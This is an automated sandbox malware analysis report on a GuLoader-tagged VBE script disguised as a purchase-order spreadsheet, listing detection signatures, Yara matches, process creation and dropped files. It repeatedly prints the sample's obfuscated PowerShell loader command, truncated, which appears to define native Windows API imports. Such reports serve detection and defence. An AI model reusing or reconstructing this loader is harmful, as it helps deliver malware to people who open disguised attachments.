Windows Analysis Report
PO-08784 xlsx.vbe

Overview

General Information

Sample Name:	PO-08784 xlsx.vbe
Analysis ID:	755441
MD5:	266115592f966240c14dfeeec624bdf5
SHA1:	455a06b52d8e8f46d9a80067d3d1b1ea23036d65
SHA256:	1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2
Tags:	GuLoadervbe
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Sigma detected: Dot net compiler compiles file from suspicious location

Obfuscated command line found

Wscript starts Powershell (via cmd or directly)

Machine Learning detection for dropped file

Very long command line found

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Drops PE files

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Compiles C# or VB.Net code

Found dropped PE file which has not been started or loaded

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Classification

Signatures

AV Detection

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll

Joe Sandbox ML: detected

Source:

Binary string: l:C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.pdb source: powershell.exe, 00000003.00000002.541727874.0000000005789000.00000004.00000800.00020000.00000000.sdmp

Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.526784989.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.536819420.0000000005484000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 5064, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T	Jump to behavior

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4705
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4705			Jump to behavior

Yara signature match

Source: PO-08784 xlsx.vbe, type: SAMPLE	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_6000.amsi.csv, type: OTHER	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 5064, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4620:120:WilError_01

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5urju1b3.luw.ps1

Jump to behavior

Source: classification engine

Classification label: mal72.expl.winVBE@11/9@0/0

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Binary string: l:C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.pdb source: powershell.exe, 00000003.00000002.541727874.0000000005789000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Obfuscated command line found

